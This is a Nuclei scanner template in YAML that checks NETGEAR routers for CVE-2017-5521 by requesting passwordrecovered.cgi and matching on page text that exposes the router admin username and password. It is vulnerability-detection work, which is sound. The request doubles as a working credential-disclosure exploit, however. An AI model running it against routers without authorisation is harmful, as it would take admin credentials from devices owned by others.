nuclei-templates/cves/2017/CVE-2017-5521.yaml

40 lines
1.3 KiB
YAML

id: CVE-2017-5521
info:
name: NETGEAR Routers - Authentication Bypass
author: princechaddha
severity: high
description: |
NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
reference:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
- http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
- http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5521
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-5521
cwe-id: CWE-200
tags: cve,cve2017,auth-bypass,netgear,router,kev
requests:
- method: GET
path:
- "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "right\">Router\\s*Admin\\s*Username<"
- "right\">Router\\s*Admin\\s*Password<"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/06/19